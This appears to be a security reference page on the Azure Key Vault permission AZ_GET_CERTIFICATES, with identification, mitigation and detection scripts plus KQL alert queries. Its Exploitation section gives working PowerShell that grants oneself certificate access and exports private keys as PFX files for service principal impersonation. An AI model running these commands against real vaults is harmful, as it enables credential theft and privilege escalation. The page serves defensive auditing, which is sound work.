
# AZ\_GET\_CERTIFICATES

## Summary

|                            |                                                                                                                                                                              |
| -------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**    | AZ\_GET\_CERTIFICATES                                                                                                                                                        |
| **Azure Alias**            | Get Certificates (Key Vault Data Plane)                                                                                                                                      |
| **Affected Object Types**  | Key Vaults                                                                                                                                                                   |
| **Exploitation Certainty** | Certain                                                                                                                                                                      |
| **Permission**             | Key Vault data-plane permission `certificates/get` — either via Key Vault access policy or Azure RBAC role **Key Vault Certificates User** or **Key Vault Certificate User** |

## Description

`AZ_GET_CERTIFICATES` represents the ability to **read certificates** from an Azure Key Vault. This is a data-plane permission that allows retrieval of certificate objects (and their associated private keys, if exportable) stored in the vault.

Key Vault certificates are used for:

* **Service principal authentication** — certificates used as credentials for Entra ID applications.
* **TLS/SSL certificates** — for web apps, API gateways, and other services.
* **Code signing certificates**.
* **Encryption certificates** — S/MIME, document encryption.

The most dangerous scenario is when certificates are used as **service principal credentials**. Exporting such a certificate allows an attacker to authenticate as the service principal and inherit all its permissions, including potentially privileged API permissions or Azure RBAC roles.

## Identification

### PowerShell (Az Module)

```powershell
Connect-AzAccount

# Check access policies on a vault (vault access policy model)
$vault = Get-AzKeyVault -VaultName "<VaultName>"
# Anchor the match: an unanchored "get|list" would also hit getissuers/listissuers
$vault.AccessPolicies | Where-Object { $_.PermissionsToCertificates -match "^(get|list|all)$" } |
    Select-Object DisplayName, ObjectId, PermissionsToCertificates |
    Format-Table -AutoSize

# Check RBAC assignments (RBAC access model)
Get-AzRoleAssignment -Scope $vault.ResourceId |
    Where-Object { $_.RoleDefinitionName -match "Key Vault Certificate" -or $_.RoleDefinitionName -eq "Key Vault Administrator" } |
    Select-Object DisplayName, RoleDefinitionName, ObjectType |
    Format-Table -AutoSize
```

### Azure GUI

1. Open **Azure Portal** → navigate to the target **Key Vault**.
2. Go to **Access policies** → review policies that include **Get** under **Certificate permissions**.
3. Alternatively, go to **Access control (IAM)** → review assignments for certificate-related roles.

## Exploitation

### Step 1 — Grant Yourself Certificate Access (as Key Vault Contributor)

```powershell
Connect-AzAccount

# Grant yourself certificate get/list permissions via access policy
Set-AzKeyVaultAccessPolicy -VaultName "<VaultName>" `
    -ObjectId "<YourObjectId>" `
    -PermissionsToCertificates get,list
```

### Step 2 — Read and Export Certificates

```powershell
Connect-AzAccount

# List all certificates in the vault
$certs = Get-AzKeyVaultCertificate -VaultName "<VaultName>"

# Read each certificate
$certs | ForEach-Object {
    $cert = Get-AzKeyVaultCertificate -VaultName "<VaultName>" -Name $_.Name
    [PSCustomObject]@{
        Name       = $_.Name
        Thumbprint = $cert.Thumbprint
        NotBefore  = $cert.NotBefore
        Expires    = $cert.Expires
        Enabled    = $cert.Enabled
    }
} | Format-Table -AutoSize

# Export certificate with private key (if exportable)
$certName = "<CertName>"
$secret = Get-AzKeyVaultSecret -VaultName "<VaultName>" -Name $certName -AsPlainText
$secretBytes = [Convert]::FromBase64String($secret)
[IO.File]::WriteAllBytes(".\$certName.pfx", $secretBytes)
Write-Host "Certificate exported to .\$certName.pfx"
```

![Read and Export Certificates](/files/WE2nEzGVlA5rkGP06RuR)

### Via PowerZure

* Get-AzureKeyVaultContent
* Export-AzureKeyVaultContent

## Opsec Considerations

Azure records every certificate read against the Key Vault: each `CertificateGet` operation appears in the Key Vault diagnostic logs (provided **AuditEvent** logging is enabled) together with the caller identity and source IP address.

## Mitigation

1. **Restrict certificate access policies**
   * Go to **Azure Portal** → target Key Vault → **Access policies**.
   * Remove `get` permission from any principal that does not need to read certificates.
2. **Mark certificates as non-exportable**
   * When creating certificates, set the private key as **not exportable** to prevent extraction.
3. **Switch to Azure RBAC model**
   * Use granular RBAC roles for certificate access control.
4. **Use managed identities instead of certificates**
   * Prefer managed identities over certificate-based service principal authentication where possible.
5. **Enable diagnostic logging**
   * Go to Key Vault → **Diagnostic settings** → enable **AuditEvent** logging.
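The following script is an added example (not FSProtect's or the Az module's own code) for mitigation items 1 and 2: it reports which certificates in a vault still carry exportable private keys and builds the non-exportable policy to use for new certificates. It assumes the `Az.KeyVault` module, an authenticated `Connect-AzAccount` session, and placeholder subject/certificate names.

```powershell
# Added example: audit exportable certificate keys in a vault and define a
# non-exportable policy for new certificates. Assumes Az.KeyVault is loaded.
param(
    [Parameter(Mandatory)] [string] $VaultName
)

# 1. Report every certificate whose policy allows the private key to be exported.
#    Get-AzKeyVaultCertificatePolicy exposes the policy's Exportable flag.
function Get-ExportableCertificateReport {
    param([string] $VaultName)

    Get-AzKeyVaultCertificate -VaultName $VaultName | ForEach-Object {
        $policy = Get-AzKeyVaultCertificatePolicy -VaultName $VaultName -Name $_.Name
        [PSCustomObject]@{
            Name       = $_.Name
            Enabled    = $_.Enabled
            Expires    = $_.Expires
            Exportable = [bool]$policy.Exportable   # $true: the PFX can be pulled via SecretGet
            KeyType    = $policy.KeyType
        }
    }
}

$report = @(Get-ExportableCertificateReport -VaultName $VaultName)
$report | Sort-Object Exportable -Descending | Format-Table -AutoSize

$atRisk = @($report | Where-Object Exportable)
Write-Host ("{0} of {1} certificates have exportable private keys" -f $atRisk.Count, $report.Count)

# 2. Policy for new certificates: the private key is generated inside the vault and
#    cannot be exported, so CertificateGet/SecretGet only ever return the public part.
#    Subject name, validity and renewal values below are illustrative placeholders.
$nonExportablePolicy = New-AzKeyVaultCertificatePolicy `
    -SubjectName "CN=app.example.invalid" `
    -IssuerName Self `
    -KeyType RSA -KeySize 2048 `
    -KeyNotExportable `
    -ValidityInMonths 12 `
    -RenewAtNumberOfDaysBeforeExpiry 30

# Add-AzKeyVaultCertificate creates a certificate under that policy. Left commented so
# the script is read-only by default; uncomment to create "<NewCertName>".
# Add-AzKeyVaultCertificate -VaultName $VaultName -Name "<NewCertName>" -CertificatePolicy $nonExportablePolicy
```

Changing the policy does not retroactively protect a key that was already generated as exportable; reissue those certificates so a fresh, non-exportable key is created.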

## Detection

Monitor certificate access in **Key Vault diagnostic logs**.

* Enable **AuditEvent** logging on the Key Vault.
* Alert on:
  * `CertificateGet` operations, especially on certificates used for service principal auth.
  * Bulk certificate access from unusual identities.
  * Certificate downloads outside of expected automation patterns.

### Azure Monitor / Log Analytics (KQL)

```kql
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.KEYVAULT"
| where OperationName in ("CertificateGet", "CertificateList", "SecretGet")
| project TimeGenerated, CallerIPAddress, OperationName, ResultType, identity_claim_upn_s, Resource, id_s
```
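As an added example (not part of the FSProtect page), the script below runs a query built on the same `AzureDiagnostics` columns against a Log Analytics workspace and flags the two alert conditions listed above: bulk `CertificateGet` activity and callers outside the expected automation set. `<WorkspaceId>`, the threshold and the expected-caller list are placeholder assumptions.

```powershell
# Added example: evaluate Key Vault AuditEvent data for bulk or unexpected
# CertificateGet activity. Assumes Az.OperationalInsights and that Key Vault
# diagnostic logs are routed to the workspace named below.
$WorkspaceId     = "<WorkspaceId>"
$LookbackHours   = 24
$BulkThreshold   = 10          # CertificateGet calls per caller/IP pair treated as bulk
$ExpectedCallers = @(          # identities that read certificates as known automation
    "cert-rotation-automation@example.invalid"
)

# Service principals carry no UPN claim, so fall back to the application id claim.
$query = @"
AzureDiagnostics
| where TimeGenerated > ago(${LookbackHours}h)
| where ResourceProvider == "MICROSOFT.KEYVAULT"
| where OperationName == "CertificateGet" and ResultType == "Success"
| extend Caller = coalesce(tostring(identity_claim_upn_s), tostring(identity_claim_appid_g))
| summarize Gets = count(), Certificates = dcount(id_s),
            First = min(TimeGenerated), Last = max(TimeGenerated)
    by Caller, CallerIPAddress, Resource
"@

function Get-SuspiciousCertificateAccess {
    $result = Invoke-AzOperationalInsightsQuery -WorkspaceId $WorkspaceId -Query $query
    foreach ($row in $result.Results) {
        $reasons = @()
        if ([int]$row.Gets -ge $BulkThreshold) {
            $reasons += "bulk access ($($row.Gets) gets across $($row.Certificates) certificates)"
        }
        if ($row.Caller -notin $ExpectedCallers) {
            $reasons += "caller not in expected automation list"
        }
        if ($reasons) {
            [PSCustomObject]@{
                Vault   = $row.Resource
                Caller  = $row.Caller
                IP      = $row.CallerIPAddress
                Window  = "$($row.First) .. $($row.Last)"
                Reasons = $reasons -join "; "
            }
        }
    }
}

Get-SuspiciousCertificateAccess | Format-Table -AutoSize
```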

## References

* <https://learn.microsoft.com/en-us/azure/key-vault/certificates/about-certificates>
* <https://blog.netspi.com/azure-automation-accounts-key-stores/>
* <https://powerzure.readthedocs.io/en/latest/Functions/operational.html#get-azurekeyvaultcontent>

